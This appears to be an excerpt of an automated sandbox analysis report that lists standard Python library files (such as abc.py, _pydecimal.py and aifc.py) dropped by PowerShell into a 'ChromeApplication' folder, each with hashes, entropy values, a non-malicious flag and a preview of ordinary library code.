                                                                                                                                                                                                  Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for collections, according to PEP 3119.....Unit tests are in test_collections..."""....from abc import ABCMeta, abstractmethod..import sys....GenericAlias = type(list[int])..EllipsisType = type(...)..def _f(): pass..FunctionType = type(_f)..del _f....__all__ = ["Awaitable", "Coroutine",.. "AsyncIterable", "AsyncIterator", "AsyncGenerator",.. "Hashable", "Iterable", "Iterator", "Generator", "Reversible",.. "Sized", "Container", "Callable", "Collection",.. "Set", "MutableSet",.. "Mapping", "MutableMapping",.. "MappingView", "KeysView", "ItemsView", "ValuesView",.. "Sequence", "MutableSequence",.. "ByteString",.. ]....# This module has been renamed from collections.abc to _collections_abc to..# speed up interpreter startup. Some of the types such as MutableMapping ar

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_compat_pickle.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9000
                                                                                                                                                                                                  Entropy (8bit):5.07161975591546
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:jX+gYVVcndom2qXur3co6d/f1OlQcrG5EbhqRbRB:T+gYVVcnrkco6d/f1OlQcC5ES1B
                                                                                                                                                                                                  MD5:39786C0D6501D2955C13CFD37EA658CA
                                                                                                                                                                                                  SHA1:D099113552AA952CBA09ED87CE277EE15D297749
                                                                                                                                                                                                  SHA-256:722B53F3D1843ED446B55B92D039A58B139503192B4D818B2D8B8231EB32E7AB
                                                                                                                                                                                                  SHA-512:D5D94D9D889D6E8652C111625E148BAEF924AFBA08CBEDD450787743435AB121E56DFC18206C29082ED1D96FCE3AC222FA5822C99A0A992971C37A6450823296
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This module is used to map the old Python 2 names to the new names used in..# Python 3 for the pickle module. This needed to make pickle streams..# generated with Python 2 loadable by Python 3.....# This is a copy of lib2to3.fixes.fix_imports.MAPPING. We cannot import..# lib2to3 and use the mapping defined there, because lib2to3 uses pickle...# Thus, this could cause the module to be imported recursively...IMPORT_MAPPING = {.. '__builtin__' : 'builtins',.. 'copy_reg': 'copyreg',.. 'Queue': 'queue',.. 'SocketServer': 'socketserver',.. 'ConfigParser': 'configparser',.. 'repr': 'reprlib',.. 'tkFileDialog': 'tkinter.filedialog',.. 'tkSimpleDialog': 'tkinter.simpledialog',.. 'tkColorChooser': 'tkinter.colorchooser',.. 'tkCommonDialog': 'tkinter.commondialog',.. 'Dialog': 'tkinter.dialog',.. 'Tkdnd': 'tkinter.dnd',.. 'tkFont': 'tkinter.font',.. 'tkMessageBox': 'tkinter.messagebox',.. 'ScrolledText': 'tkinter.scrolledtext',.. 'Tkconstants':

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_compression.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5843
                                                                                                                                                                                                  Entropy (8bit):4.312570122004757
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ArOasdGagyvLQOAj+pPbO6bf/Zvlf0rwazuza6:eOasdbtlb/fcrwazuza6
                                                                                                                                                                                                  MD5:F75E9299E14E9B11FD7DAE94D061253E
                                                                                                                                                                                                  SHA1:6025D13A35D283496DC83444366FE93E22B03B61
                                                                                                                                                                                                  SHA-256:A10CF1A317374641BCDB8252499E9CB9D4D6E774AC724EDFDDDD0433EAD771D9
                                                                                                                                                                                                  SHA-512:BEE88E9C44A2477E7679F47F414FF8327AD06EF4E81D65405A1D55E9684040838C9F30F3F0A35FF0C5A7E850B858FE83E48734BE7EA171A1F5DBB75FB45A2FB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Internal classes used by the gzip, lzma and bz2 modules"""....import io..import sys....BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE # Compressed data read chunk size......class BaseStream(io.BufferedIOBase):.. """Mode-checking helper functions.""".... def _check_not_closed(self):.. if self.closed:.. raise ValueError("I/O operation on closed file").... def _check_can_read(self):.. if not self.readable():.. raise io.UnsupportedOperation("File not open for reading").... def _check_can_write(self):.. if not self.writable():.. raise io.UnsupportedOperation("File not open for writing").... def _check_can_seek(self):.. if not self.readable():.. raise io.UnsupportedOperation("Seeking is only supported ".. "on files open for reading").. if not self.seekable():.. raise io.UnsupportedOperation("The underlying file object "..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_markupbase.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15049
                                                                                                                                                                                                  Entropy (8bit):4.144690404366886
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hJdW3aalUU2IJWEY4tokA+jFW/tFoak6iExy/LemE/9ueOU:hJRalUU2IJWIo+jEFGaw1iN
                                                                                                                                                                                                  MD5:2DFE8125174DDC3D0694E41EB8489C58
                                                                                                                                                                                                  SHA1:EF097AC9988D1E06BE47D771008B53797682156D
                                                                                                                                                                                                  SHA-256:914361CF055D5D2E1B69A2603A5C94B22DEDB987D72CE9F791AFEC0524718F28
                                                                                                                                                                                                  SHA-512:E5657D6619EA50AEE6051808F5C153B75438C97231010F898D9884937C7370241C4C41FA695B002D1AEA0489994F4FD96D3ADE037ECF30D761A99019F9E1E043
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Shared support for scanning document type declarations in HTML and XHTML.....This module is used as a foundation for the html.parser module. It has no..documented public API and should not be used directly....."""....import re...._declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match.._declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match.._commentclose = re.compile(r'--\s*>').._markedsectionclose = re.compile(r']\s*]\s*>')....# An analysis of the MS-Word extensions is available at..# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf...._msmarkedsectionclose = re.compile(r']\s*>')....del re......class ParserBase:.. """Parser base class which provides some common support methods used.. by the SGML/HTML and XHTML parsers.""".... def __init__(self):.. if self.__class__ is ParserBase:.. raise RuntimeError(.. "_markupbase.ParserBase must be subclassed").... def reset(self):.. self.lineno = 1..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_osx_support.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22361
                                                                                                                                                                                                  Entropy (8bit):4.723787766897489
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:KEQb8Fu0jFaUTj065gw4DehE58J+pPSUbjaMVqnV6sxlVItVnCfvQY+yLq6NT:KB8Fu0jFaYj0sgve81pP3SAYy2
                                                                                                                                                                                                  MD5:FC4CA3F0DD53369CBDE78E6F34D6D1E0
                                                                                                                                                                                                  SHA1:EF1914BA73779F330B6EBB6F68752E5302F4C5E4
                                                                                                                                                                                                  SHA-256:66881ABF03400804BC29B465BE8A6560A78EFED1F7CED3FAF9FECAA586157B00
                                                                                                                                                                                                  SHA-512:6E6D3F2D62200478381E337872F27F65C86650D88F6E69ADBFB25FD90B9F2A94466253D6670727863DD33A9318F11D800E754E2969BE183DF5B2C1E18FBC0834
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Shared OS X support functions."""....import os..import re..import sys....__all__ = [.. 'compiler_fixup',.. 'customize_config_vars',.. 'customize_compiler',.. 'get_platform_osx',..]....# configuration variables that may contain universal build flags,..# like "-arch" or "-isdkroot", that may need customization for..# the user environment.._UNIVERSAL_CONFIG_VARS = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS', 'BASECFLAGS',.. 'BLDSHARED', 'LDSHARED', 'CC', 'CXX',.. 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS')....# configuration variables that may contain compiler calls.._COMPILER_CONFIG_VARS = ('BLDSHARED', 'LDSHARED', 'CC', 'CXX')....# prefix added to original configuration variable names.._INITPRE = '_OSX_SUPPORT_INITIAL_'......def _find_executable(executable, path=None):.. """Tries to find 'executable' in the directories listed in 'path'..... A string listing dir

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_py_abc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6336
                                                                                                                                                                                                  Entropy (8bit):4.398612520141537
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:tChBz2a5ZMoU3JhZqwCtb4kmAp0PT5L7AH4/kt/E/StLp/kL/5:tChtjgJhZZKb4qH/7O
                                                                                                                                                                                                  MD5:E9F2D6D09F06D7E0772B74B32759881C
                                                                                                                                                                                                  SHA1:6E4A2145565B7B9436CB7DB5CF18FA97E9B3BEE0
                                                                                                                                                                                                  SHA-256:8F790C97331A66EA442964314843F7CC8863FB3D9B899183F6D02598D4361A5C
                                                                                                                                                                                                  SHA-512:D3D22D17387A04B79AB54C7F71E994A075AB309057A8F98A3972E0F17535C4D905342D282ECF3D1A8A99351BBC8AEC207E7E277B0377255572153A80EFBB07A6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:from _weakrefset import WeakSet......def get_cache_token():.. """Returns the current ABC cache token..... The token is an opaque object (supporting equality testing) identifying the.. current version of the ABC cache for virtual subclasses. The token changes.. with every call to ``register()`` on any ABC... """.. return ABCMeta._abc_invalidation_counter......class ABCMeta(type):.. """Metaclass for defining Abstract Base Classes (ABCs)..... Use this metaclass to create an ABC. An ABC can be subclassed.. directly, and then acts as a mix-in class. You can also register.. unrelated concrete classes (even built-in classes) and unrelated.. ABCs as 'virtual subclasses' -- these and their descendants will.. be considered subclasses of the registering ABC by the built-in.. issubclass() function, but the registering ABC won't show up in.. their MRO (Method Resolution Order) nor will method.. implementations defined by the registering ABC be callable

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_pydecimal.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):235086
                                                                                                                                                                                                  Entropy (8bit):4.562739393111887
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:PPcxAkfLyemfbPcKpNLuUxOapxHPfm+LymnJvD:3BxP9
                                                                                                                                                                                                  MD5:21CC2DE5228D758FC246AE2FBDEAC4FD
                                                                                                                                                                                                  SHA1:AFCB2A98A4E45128694B949931E9C759124A9CEC
                                                                                                                                                                                                  SHA-256:690E82A528EFB2E9C6C4B624BF28D9F7DF9B8007C3E26FC606ABE8E4C670734A
                                                                                                                                                                                                  SHA-512:C72CE199737C56D2A2214CF9B3C047713C5115A110E3D7F6E35F03CE4ECAB84B76D1E144B04659BE66C30C280747A3167518FB2A9A947F0E08065587B714613D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright (c) 2004 Python Software Foundation...# All rights reserved.....# Written by Eric Price <eprice at tjhsst.edu>..# and Facundo Batista <facundo at taniquetil.com.ar>..# and Raymond Hettinger <python at rcn.com>..# and Aahz <aahz at pobox.com>..# and Tim Peters....# This module should be kept in sync with the latest updates of the..# IBM specification as it evolves. Those updates will be treated..# as bug fixes (deviation from the spec is a compatibility, usability..# bug) and will be backported. At this point the spec is stabilizing..# and the updates are becoming fewer, smaller, and less significant....."""..This is an implementation of decimal floating point arithmetic based on..the General Decimal Arithmetic Specification:.... http://speleotrove.com/decimal/decarith.html....and IEEE standard 854-1987:.... http://en.wikipedia.org/wiki/IEEE_854-1987....Decimal floating point has finite precision with arbitrarily large bounds.....The purpose of this modul

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_pyio.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):97185
                                                                                                                                                                                                  Entropy (8bit):4.3648688617698745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:vi9tkVWSOWuoT4fWEai+6zQWB/5bjhpYgmRA+d:vi9tkU7kuWEai+6cWp5bj3TmRT
                                                                                                                                                                                                  MD5:0D371E43F9E94B567CF4701233E240CB
                                                                                                                                                                                                  SHA1:516298CDB14B87A60CCD14FC1742BF8F1EE26197
                                                                                                                                                                                                  SHA-256:8F2DC04AC4E7281967EC2F124C7CE64CAFF24018A88540AFDE3407A26873589E
                                                                                                                                                                                                  SHA-512:B6E175F27F17F9B90857DBABE64601A5674FDBA0A8E8494649A5890024E7C83092D92C2E892573572F5E8CEF854F0021E0F877C90C38179305A3B1589C899E16
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..Python implementation of the io module..."""....import os..import abc..import codecs..import errno..import stat..import sys..# Import _thread instead of threading to reduce startup cost..from _thread import allocate_lock as Lock..if sys.platform in {'win32', 'cygwin'}:.. from msvcrt import setmode as _setmode..else:.. _setmode = None....import io..from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)....valid_seek_flags = {0, 1, 2} # Hardwired values..if hasattr(os, 'SEEK_HOLE') :.. valid_seek_flags.add(os.SEEK_HOLE).. valid_seek_flags.add(os.SEEK_DATA)....# open() uses st_blksize whenever we can..DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes....# NOTE: Base classes defined here are registered with the "official" ABCs..# defined in io.py. We don't use real inheritance though, because we don't want..# to inherit the C implementations.....# Rebind for compatibility..BlockingIOError = BlockingIOError....# Does io.IOBase finalizer log the exception if the close() method fails?

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3231
                                                                                                                                                                                                  Entropy (8bit):4.290837712719538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:LCIcLnTrq7B8nUOOU3ciXy0JFBOjpQ8sHLf1vHKGysSO4:LmnTWjOOU3cc0+rxHKGB94
                                                                                                                                                                                                  MD5:2E95AAF9BD176B03867862B6DC08626A
                                                                                                                                                                                                  SHA1:3AFA2761119AF29519DC3DAD3D6C1A5ABCA67108
                                                                                                                                                                                                  SHA-256:924F95FD516ECAEA9C9AF540DC0796FB15EC17D8C42B59B90CF57CFE15962E2E
                                                                                                                                                                                                  SHA-512:080495FB15E7C658094CFE262A8BD884C30580FD6E80839D15873F27BE675247E2E8AEC603D39B614591A01ED49F5A07DD2ACE46181F14B650C5E9EC9BB5C292
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..The objects used by the site module to add custom builtins..."""....# Those objects are almost immortal and they keep a reference to their module..# globals. Defining them in the site module would keep too many references..# alive...# Note this means this module should also avoid keep things alive in its..# globals.....import sys....class Quitter(object):.. def __init__(self, name, eof):.. self.name = name.. self.eof = eof.. def __repr__(self):.. return 'Use %s() or %s to exit' % (self.name, self.eof).. def __call__(self, code=None):.. # Shells like IDLE catch the SystemExit, but listen when their.. # stdin wrapper is closed... try:.. sys.stdin.close().. except:.. pass.. raise SystemExit(code)......class _Printer(object):.. """interactive prompt objects for printing the license text, a list of.. contributors and the copyright notice.""".... MAXLINES = 23.... def __init__(self, name,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_strptime.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25856
                                                                                                                                                                                                  Entropy (8bit):4.576262974956046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:C1pVFxVyOs4/p6WSDmyeMjjiIltKcKdrxrTZprdw2W6dNtxz/kNVGC/JrbruMREb:C1FxIO7/p6Woph/5uZTvVrz/g3HuMQCi
                                                                                                                                                                                                  MD5:B4CB6BF5E35DC2F8A8D10014F66A72C0
                                                                                                                                                                                                  SHA1:8461CA8CFE93FBC0FC385A03428E9B248BE750C7
                                                                                                                                                                                                  SHA-256:770CD20E1D9381A3850401868BF1CA375C6BF5AEC7F8E031B6210DF98D789E3F
                                                                                                                                                                                                  SHA-512:775762E38D0CA8B954D37DF4BD8CAF76ACD97C3399C0774592D01494A2F2141C2C2EBB4DC29E2A40ACE01A81C46E5EC76FAB9744ABCFDFEC826BDDF83E61B5D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Strptime-related classes and functions.....CLASSES:.. LocaleTime -- Discovers and stores locale-specific time information.. TimeRE -- Creates regexes for pattern matching a string of text containing.. time information....FUNCTIONS:.. _getlang -- Figure out what language is being used for the locale.. strptime -- Calculates the time struct represented by the passed-in string...."""..import time..import locale..import calendar..from re import compile as re_compile..from re import IGNORECASE..from re import escape as re_escape..from datetime import (date as datetime_date,.. timedelta as datetime_timedelta,.. timezone as datetime_timezone)..from _thread import allocate_lock as _thread_allocate_lock....__all__ = []....def _getlang():.. # Figure out what the current language is set to... return locale.getlocale(locale.LC_TIME)....class LocaleTime(object):.. """Stores and handles locale-specific information relat

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_threading_local.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7462
                                                                                                                                                                                                  Entropy (8bit):4.6221334949688195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:/RCb6QO/SjgBOiCX1BfaOajqBG2DI0WFwoV4KLgKxDl0D3YzgDPYhFSnRKipzXhH:DQO6kBOiCXSO5BZIr4aCYUsho9R
                                                                                                                                                                                                  MD5:2ACCB96019A97C9B237FA45AB4E67BBF
                                                                                                                                                                                                  SHA1:E1C573319C6E01E1222EAD90E5C34C58D22021EF
                                                                                                                                                                                                  SHA-256:27BB2BD201E6157EFDD807EC5E3F3C5A8E0EA2EA2E86ED475A59DE8C6442A0EB
                                                                                                                                                                                                  SHA-512:26F75E0A32F02E85C3258F7B37440FC83C775AB64B31497217A2090228CAE2EF732166B5E07865DDCC0D82FD69CF80EA2F3DA020C7FCA8F09E39390EB768F04D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Thread-local objects.....(Note that this module provides a Python version of the threading.local.. class. Depending on the version of Python you're using, there may be a.. faster one available. You should always import the `local` class from.. `threading`.)....Thread-local objects support the management of thread-local data...If you have data that you want to be local to a thread, simply create..a thread-local object and use its attributes:.... >>> mydata = local().. >>> mydata.number = 42.. >>> mydata.number.. 42....You can also access the local-object's dictionary:.... >>> mydata.__dict__.. {'number': 42}.. >>> mydata.__dict__.setdefault('widgets', []).. [].. >>> mydata.widgets.. []....What's important about thread-local objects is that their data are..local to a thread. If we access the data in a different thread:.... >>> log = [].. >>> def f():.. ... items = sorted(mydata.__dict__.items()).. ... log.append(items).. ... mydata.number = 11.. ... l

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_weakrefset.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6129
                                                                                                                                                                                                  Entropy (8bit):4.19143974100249
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:EBC2FPYi/mDV2/2vGd24QB2oa+qBdXsSP4m4FE8445m4IinbyQqVRA6U4e4nC8C7:ELj/7euM4QgoofXsm4m4FH4484I+byFW
                                                                                                                                                                                                  MD5:B63A969483B85C6E81E57B8FABE80F2F
                                                                                                                                                                                                  SHA1:8945995094A976581C83455D9ED14F2B81CB7212
                                                                                                                                                                                                  SHA-256:5B03D51D4CB46AA7EFFAD1B1ACE0847808E5A43F1EAE7CC9682284A8D0701A76
                                                                                                                                                                                                  SHA-512:C4352A0E90FBA11873D4CD61C9E9D978682DB1BBDAB0CFA668F1913DDFD4132791738AFC08EEC931CCC296DAD1B13DB24DBAC8339D235704A7A049AF30683C56
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Access WeakSet through the weakref module...# This code is separated-out because it is needed..# by abc.py to load everything else at startup.....from _weakref import ref..from types import GenericAlias....__all__ = ['WeakSet']......class _IterationGuard:.. # This context manager registers itself in the current iterators of the.. # weak container, such as to delay all removals until the context manager.. # exits... # This technique should be relatively thread-safe (since sets are)..... def __init__(self, weakcontainer):.. # Don't create cycles.. self.weakcontainer = ref(weakcontainer).... def __enter__(self):.. w = self.weakcontainer().. if w is not None:.. w._iterating.add(self).. return self.... def __exit__(self, e, t, b):.. w = self.weakcontainer().. if w is not None:.. s = w._iterating.. s.remove(self).. if not s:.. w._commit_removals()......class Weak

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6710
                                                                                                                                                                                                  Entropy (8bit):4.481959964393442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:gPAaxlPl/yqe//e/2Dkpps4BWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlP1u9kU+0TmnTLikZW9CxbOJbYQ
                                                                                                                                                                                                  MD5:3A8E484DC1F9324075F1E574D7600334
                                                                                                                                                                                                  SHA1:D70E189BA3A4CF9BEA21A1BBC844479088BBD3A0
                                                                                                                                                                                                  SHA-256:A63DE23D93B7CC096AE5DF79032DC2E12778B134BB14F7F40AC9A1F77F102577
                                                                                                                                                                                                  SHA-512:2C238B25DD1111EE37A3D7BF71022FE8E6C1D7ECE86B6BBDFA33EE0A3F2A730590FE4BA86CC88F4194D60F419F0FEF09776E5ECA1C473D3F6727249876F00441
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, ...):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmethod' with 'ab

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\aifc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33552
                                                                                                                                                                                                  Entropy (8bit):4.4638619417349945
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Ob3TMIq3JHejezqFTYQjJFUT2uXUmwlKje3W73igkZIS3WXpRY:4MHpejezqF0gAT2u/NK3W7Dk9cY
                                                                                                                                                                                                  MD5:BF5911BEAF58D01F1317D4416B929EED
                                                                                                                                                                                                  SHA1:4D6191C34468BCDEDBDFF0CFE1EB7F44A83BAB27
                                                                                                                                                                                                  SHA-256:2EFBA033EF47B3E19DBCDCB6762B9B49AB1982EAE3B9D649548D15AFADC78DAF
                                                                                                                                                                                                  SHA-512:B88E727115CEFDFD31498370DACD7FF3ADBF3BD511B06367CB6A9513B5419A6B1A2A83822561E11BF6B41BC6A7AFED4ACBFC542F18CAFE18E741E576380E234D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\antigravity.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):517
                                                                                                                                                                                                  Entropy (8bit):5.2580863991460935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                                                                                                                  MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                                                                                                                  SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                                                                                                                  SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                                                                                                                  SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\argparse.py

                                                                                                                                                                                                  Download File
